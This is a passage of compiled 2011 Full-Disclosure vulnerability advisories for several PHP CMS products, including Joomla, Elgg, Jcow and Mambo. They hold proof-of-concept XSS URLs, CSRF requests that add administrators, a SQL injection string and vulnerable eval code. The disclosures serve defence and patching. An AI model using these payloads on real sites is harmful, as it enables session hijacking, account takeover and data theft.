/index.php?module=Campaignsaction=EditViewrecord=124return_module=Campaigns%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sreturn_action=indexparenttab=Marketingreturn_viewname=29
Parameter: returnaction
/index.php?module=Settingsaction=createnewgroupreturnaction=listgroups%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sparenttab=Settingsmode=editgroupId=2
Parameter: roleid
/index.php?module=Settingsaction=RoleDetailViewroleid=H2%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=s
Parameter: src_module
/index.php?module=Settingsaction=ModuleManagermodule_update=Step1src_module=Mobile3%20style%3dbackground-image%3aurl(javascript:alert(/XSS/))%20x=sparenttab=Setting
Parameter: view
/index.php?action=indexmodule=Calendarview=week%20style%3dxss%3aexpression(alert(1))hour=0day=5month=9year=2010viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1
6. SOLUTION
No patched version is available yet.
The vendor hasn't attempted to fix the issues though they acknowledged
the reports.
7. VENDOR
vTiger Development Team
http://www.vtiger.com/
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-12-08: notified vendor
2011-10-04: no fixed version released yet
2011-10-04: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_XSS
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
#yehg [2011-10-04]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities
1. OVERVIEW
Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.
2. BACKGROUND
Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.
3. VULNERABILITY DESCRIPTION
Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim's browser.
4. VERSION AFFECTED
1.7.0 =
5. PROOF-OF-CONCEPT/EXPLOIT
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=
[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=searchItemid=435searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssoption=com_search
[/REQUEST]
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
http://localhost/joomla17_noseo/administrator/index.php?option=com_categoriesextension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22
Parameter: asset , Component: com_media
http://localhost/joomla17_noseo/administrator/index.php?option=com_mediaview=imagestmpl=componente_name=jform_articletextasset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22author=
Parameter: author, Component: com_media
http://localhost/joomla17_noseo/administrator/index.php?option=com_mediaview=imagestmpl=componente_name=jform_articletextasset=author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22x=%22
6. IMPACT
Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.
7. SOLUTION
Upgrade to Joomla! 1.7.1-stable or higher.
8. VENDOR
Joomla! Developer Team
http://www.joomla.org
9. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
10. DISCLOSURE TIME-LINE
2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed
11. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability
#yehg [2011-09-29]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery (CSRF) Vulnerability
Advanced Electron Forums (AEF) 1.0.9 = Cross Site Request Forgery (CSRF) Vulnerability 1. OVERVIEW The Advanced Electron Forums (AEF) 1.0.9 = versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND AEF has a very simple and easy to use Administration Panel and installing this software is a piece of cake! You can install new themes, customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board. 3. VULNERABILITY DESCRIPTION Advanced Electron Forums (AEF) 1.0.9 = versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user, assigning user to administrative privilege. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 1.0.9 = 5. PROOF-OF-CONCEPT/EXPLOIT The following request ecalates a normal user to an administrator. [REQUEST] POST /aef/index.php?act=editprofileuid=2 HTTP/1.1 username=testeremail=tester%40yehg.netu_member_group=1realname=title=location=gender=1privatetext=icq=yim=msn=aim=www=sig=editprofile=Edit+Profile [/REQUEST] 6. SOLUTION Partial fix is available. The vendor released a single patch for the provided vulnerable EditProfile functionality. http://www.anelectron.com/downloads/index.php?act=downloadattachatid=59 7. VENDOR Electron Inc. http://www.anelectron.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-14: notified vendor through email, website contact form submission 2011-05-17: vendor released aef 1.0.9 without the CSRF fix 2011-09-06: vendor released separate patch about the CSRF fix 2011-09-26: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[aef-1.x]_cross_site_request_forgery CSRF Wiki: https://secure.wikimedia.org/wikipedia/en/wiki/Cross-site_request_forgery #yehg [2011-09-26] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Jcow CMS 4.x:4.2 = , 5.x:5.2 = | Arbitrary Code Execution
Jcow CMS 4.x:4.2 = , 5.x:5.2 = | Arbitrary Code Execution
1. OVERVIEW
Jcow CMS versions (4.x: 4.2 and lower, 5.x: 5.2 and lower) are
vulnerable to Arbitrary Code Execution.
2. BACKGROUND
Jcow is a flexible Social Networking software written in PHP. It can
help you to build a social network for your interests and passions, a
member community for your existing website and a social networking
site like facebook/myspace/twitter.
3. VULNERABILITY DESCRIPTION
The parameter attachment is not properly sanitized upon submission
to /index.php, which allows attacker to execute arbitrary PHP code of
his own.
4. VERSIONS AFFECTED
Free version: 4.x: 4.2 and lower
Commercial version: 5.x: 5.2 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
http://dev.metasploit.com/redmine/attachments/1660/jcow_eval.rb
jcow 4.2.1:
file: /includes/libs/ss.inc.php
line: 167
$app = $_POST['attachment'];
if (strlen($app) $app != 'status') {
include_once('modules/'.$app.'/'.$app.'.php');
$c_run = $app.'::ajax_post();';
eval($c_run);
exit;
}
jcow 5.2.0:
file: /includes/libs/ss.inc.php
line: 45
$Vd2a57dc1 = $_POST['attachment']; if (strlen($Vd2a57dc1)
$Vd2a57dc1 != 'status') {
include_once('modules/'.$Vd2a57dc1.'/'.$Vd2a57dc1.'.php'); $Ve8200cee
= $Vd2a57dc1.'::ajax_post();';
eval($Ve8200cee); exit; }
6. SOLUTION
Free version users can upgrade to 4.3.1 or higher.
Commercial users can upgrade to 5.3 or higher.
7. VENDOR
Jcow CMS Development Team
http://www.jcow.net
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-06-03: notified vendor
2010-06-03: vendor replied fix would be available within 48hrs
2011-08-24: vendor released fixed versions for 4.x and 5.x,
4.3.1 for free release
5.3 for commercial release
2011-08-26: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[jcow_4.2,5.2]_arbitrary_code_execution
Jcow CMS:
http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download
#yehg [2011-08-26]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Jcow CMS 4.2 = | Cross Site Scripting
Jcow CMS 4.2 = | Cross Site Scripting 1. OVERVIEW Jcow CMS 4.2 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Jcow is a flexible Social Networking software written in PHP. It can help you to build a social network for your interests and passions, a member community for your existing website and a social networking site like facebook/myspace/twitter. 3. VULNERABILITY DESCRIPTION The parameter g is not properly sanitized upon submission to /index.php, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Jcow CMS 4.2 and lower 5. PROOF-OF-CONCEPT/EXPLOIT File: /includes/libs/member.module.php: Line 605: input type=hidden name=g value='.$_REQUEST['g'].' / http://[target]/index.php?p=member/signupemail=username=password=fullname=birthyear=1991birthmonth=01birthday=01gender=0location=Myanmar++about_me=recaptcha_challenge_field=03AHJ_Vuvk8U6zCeSdrjB0GPDuwaRP-tPJ2G7u3Nm5LpmVSGmZs_CIP9I_C0PYZ1zYY6F42zpzGKQkxSiUhhyu-QhhwZA6oTlLNntgAgmRkDjfZpu3j4-bMeQNpOVh1afb4fZ4qwaIxHpP1wL8-8-LgkEBE5auAFmF_wrecaptcha_response_field=g=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3Eonpost=1agree_rules=1 6. SOLUTION Upgrade to 4.3.1 or higher. The commercial version 5.x.x is not vulnerable. 7. VENDOR Jcow CMS Development Team http://www.jcow.net 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-06-03: notified vendor 2010-06-03: vendor replied fix would be available within 48hrs 2011-08-24: vendor released fixed version, jcow.4.3.1.ce 2011-08-26: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[jcow_4.2]_cross_site_scripting Jcow CMS: http://sourceforge.net/projects/jcow/files/jcow4/jcow.4.2.1.zip/download #yehg [2011-08-26] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Concrete CMS 5.4.1.1 = Cross Site Scripting
Concrete CMS 5.4.1.1 = Cross Site Scripting 1. OVERVIEW Concrete CMS 5.4.1.1 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click. 3. VULNERABILITY DESCRIPTION The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED CMS 5.4.1.1 = 5. PROOF-OF-CONCEPT/EXPLOIT vulnerable parameter: rcID form action=http://[target]/Concrete/index.php/login/do_login/; method=post input type=hidden name=uName value=test / input type=hidden name=uPassword value=test / input type=hidden name=rcID value=' style=display:block;color:red;width:;height:;z-index:;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover=alert(/XSS/)' / input type=submit name=submit value=Get Concrete CMS 5.4.1.1 XSS / /form 6. SOLUTION Upgrade to 5.4.2 or higher. 7. VENDOR Concrete CMS Developers http://www.concrete5.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-04-14: vulnerability reported 2011-08-04: vendor released fixed version 2011-08-23: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scripting Project Home: http://www.concrete5.org/ Vendor Release Note: http://www.concrete5.org/documentation/background/version_history/5-4-2-release-notes/ #yehg [2011-08-23] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Elgg 1.7.10 = | Multiple Vulnerabilities
1. OVERVIEW The Elgg 1.7.10 and lower versions are vulnerable to Cross Site Scripting and SQL Injection. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION The internalname parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The tag_names is not properly sanitized, which allows attacker to conduct SQL Injection attack. 4. VERSIONS AFFECTED Elgg 1.7.10 = 5. PROOF-OF-CONCEPT/EXPLOIT - Cross Site Scripting http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:99;position:absolute!important;left:0;top:0;%22%20x=%22 - SQL Injection Info Disclosure http://localhost/pg/search/?q=SQLinsearch_type=tagstag_names=location%27 6. SOLUTION Upgrade to 1.7.11 or higher. 7. VENDOR Curverider Ltd http://www.curverider.co.uk/ http://elgg.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-08-01: vulnerability reported 2011-08-15: vendor released fixed version 2011-08-18: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin Project Home: http://elgg.org/ Vendor Release Note: http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released #yehg [2011-08-18] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebsiteBaker 2.8.1 = Cross Site Request Forgery (CSRF) Vulnerability
1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Cross Site Request Forgery (CSRF). 2. BACKGROUND WebsiteBaker is a PHP-based Content Management System (CMS) designed with one goal in mind: to enable its users to produce websites with ease. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw that allows a remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists because the application does not require multiple steps or explicit confirmation for sensitive transactions for majority of administrator functions such as adding new user. By using a crafted URL, an attacker may trick the victim into visiting to his web page to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into executing arbitrary commands in the context of their session with the application, without further prompting or verification. 4. VERSIONS AFFECTED 2.8.1 = 5. PROOF-OF-CONCEPT/EXPLOIT The following request adds an administrator. [REQUEST] POST /admin/users/add.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 193 user_id=username_fieldname=username_abcdefgusername_abcdefg=testpassword=testpassword2=testdisplay_name=testemail=tester% 40yehg.nethome_folder=groups%5B%5D=1active%5B%5D=1submit=Add [/REQUEST] 6. SOLUTION Upgrade to 2.8.2 or higher 7. VENDOR WebsiteBaker Org e. V. http://www.websitebaker2.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-01-26: notified vendor 2011-08-01: vendor released fix 2011-08-13: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_cross_site_request_forgery #yehg [2011-08-13] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebsiteBaker 2.8.1 = Arbitrary File Upload Vulnerability
1. OVERVIEW WebsiteBaker 2.8.1 and lower versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). Create new templates within minutes - powered by (X)HTML, CSS and jQuery. With WebsiteBaker it's quite natural your site is W3C-valid, SEO-friendly and accessible - there are no limitations at all. 3. VULNERABILITY DESCRIPTION WebsiteBaker 2.8.1 and lower versions contain a flaw related to the /admin/media/upload.php script failing to restrict uploaded files with extensions - .htaccess, .php4, .php5, .phtml. This may allow an attacker to execute arbitrary PHP code. User account to WebsiteBaker admin backend is required. Attacker could gain access it by way of either brute force or CSRFing to currently-logged in admin users. 4. VERSIONS AFFECTED 2.8.1 = 5. SOLUTION Upgrade to 2.8.2 or higher 6. VENDOR WebsiteBaker Org e. V. http://www.websitebaker2.org/ 7. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 2011-01-26: notified vendor 2011-08-01: vendor released fix 2011-08-13: vulnerability disclosed 9. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[websitebaker-2.8.1]_arbitrary_file_upload http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/ #yehg [2011-08-13] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | SQL Injection
Mambo CMS 4.6.x (4.6.5) | SQL Injection 1. OVERVIEW Mambo CMS 4.6.5 and lower versions are vulnerable to SQL Injection. 2. BACKGROUND Mambo is a full-featured, award-winning content management system that can be used for everything from simple websites to complex corporate applications. It is used all over the world to power government portals, corporate intranets and extranets, ecommerce sites, nonprofit outreach, schools, church, and community sites. Mambo's power in simplicity also makes it the CMS of choice for many small businesses and personal sites. 3. VULNERABILITY DESCRIPTION The zorder parameter was not properly sanitized upon submission to the administrator/index2.php url, which allows attacker to conduct SQL Injection attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED Tested on Mambo CMS 4.6.5 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/mambo/administrator/index2.php?limit=10order[]=11boxchecked=0toggle=onsearch=sqlitask=limitstart=0cid[]=onzorder=-1OR (SELECT FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,112,101,58),(SELECT (CASE WHEN (=) THEN 1 ELSE 0 END)),CHAR(58,110,100,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)filter_authorid=62hidemainmenu=0option=com_typedcontent 6. SOLUTION The vendor seems to discontinue the development. It is recommended to use another CMS in active development. 7. VENDOR Mambo CMS Development Team http://mambo-developer.org 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-11-31: notified vendor through bug tracker 2011-08-12: no patched version released up to date 2011-08-12: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[mambo4.6_x]_sql_injection Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip #yehg [2011-08-12] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Elgg 1.7.9 = | Multiple Cross Site Scripting Vulnerabilities
Elgg 1.7.9 = | Multiple Cross Site Scripting Vulnerabilities 1. OVERVIEW The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross Site Scripting. 2. BACKGROUND Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php) 3. VULNERABILITY DESCRIPTION Several parameters (page_owner, content,internalname, QUERY_STRING) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Elgg 1.7.9 = 5. PROOF-OF-CONCEPT/EXPLOIT XSS (Browser All) N.B. User login is required to execute. vulnerable parameters: page_owner, content,internalname, QUERY_STRING __ REQUEST: http://localhost/elgg/mod/file/search.php?subtype=filepage_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22fcallback=true http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22 XSS (Exploitable in Older versions of Browsers - IE/FF) vulnerable parameters: send_to,container_guid = REQUEST: http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s Portion of RESPONSE: input type=hidden name=send_to value= style=background-image:url(javascript:alert(/XSS/)) x=s / REQUEST: http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22 Portion of RESPONSE: input type=hidden name=container_guid value= style=background-image:url(javascript:alert(/XSS/)) x=s / 6. SOLUTION Upgrade to 1.7.10 or higher. 7. VENDOR Curverider Ltd http://www.curverider.co.uk/ http://elgg.org/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: vulnerability reported 2011-06-14: vendor released fixed version 2011-07-30: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting Project Home: http://elgg.org/ XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2011-07-30] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
/components/content-component/article-categories/26-park-site'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'scriptalert(/XSS/)/script 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION The development of Joomla! 1.6.x has been ceased; there will be no fixed version for 1.6.x. Upgrade to Joomla! 1.7.0-stable or higher. 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-07-02: notified vendor 2011-07-19: patched version, 1.7.0, released 2011-07-22: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(XSS) Previous Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) http://yehg.net/lab/#advisories.joomla Vendor Advisory URL: http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html #yehg [2011-07-22] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities
/components/content-component/article-categories/26-park-site'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'scriptalert(/XSS/)/script http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'scriptalert(/XSS/)/script 6. IMPACT Attackers can compromise currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions. 7. SOLUTION The development of Joomla! 1.6.x has been ceased; there will be no fixed version for 1.6.x. Upgrade to Joomla! 1.7.0-stable or higher. 8. VENDOR Joomla! Developer Team http://www.joomla.org 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 2011-07-02: notified vendor 2011-07-19: patched version, 1.7.0-stable, released 2011-07-22: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.7.0-rc]_cross_site_scripting(XSS) Previous Advisory URL: http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS) http://yehg.net/lab/#advisories.joomla Vendor Advisory URL: http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html #yehg [2011-07-22] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MyST BlogSite | Multiple Vulnerabilities
